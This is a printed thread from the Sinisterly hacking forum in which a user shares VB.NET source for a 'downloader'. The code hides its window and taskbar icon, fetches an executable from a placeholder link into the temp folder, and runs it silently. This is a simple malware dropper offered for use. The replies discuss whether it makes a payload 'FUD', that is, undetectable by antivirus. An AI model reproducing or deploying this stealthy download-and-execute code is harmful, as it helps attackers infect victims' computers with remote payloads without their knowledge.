![]() |
|
Downloader [Source Code] - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.li/Forum-Visual-Basic-NET-Framework) +--- Thread: Downloader [Source Code] (/Thread-Downloader-Source-Code) |
Downloader [Source Code] - CLood - 01-29-2017 Enjoy.
Code: Skype: demCLood
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Dim funkynoise As New System.Net.WebClient
funkynoise.DownloadFile("exe direct link", Microsoft.VisualBasic.Interaction.Environ("tmp") + "/Downloader.exe")
Process.Start(Microsoft.VisualBasic.Interaction.Environ("tmp") + "/Downloader.exe")
EndPastebin Ghostbin RE: Downloader [Source Code] - Bish0pQ - 01-30-2017 Just one question. Your code clearly downloads a file, moves it to the tmp directory and executes this. Why do you think that this will make a file FUD? Most AV's are real-time scanners, that will scan the file before being opened. Avast even has something they call "Deepscan" this will scan any applications from an unidentified source before opening it. It will run a few seconds in a sandbox while it's being analyzed. Even Windows Defender handles this. Not meant offensive in any way, but this will not make your file FUD, that's all I'm saying. Thanks for the share nontheless. RE: Downloader [Source Code] - CLood - 01-30-2017 (01-30-2017, 08:45 PM)Bish0pQ Wrote: Just one question. Your code clearly downloads a file, moves it to the tmp directory and executes this. Why do you think that this will make a file FUD? Just re-shared it bro, |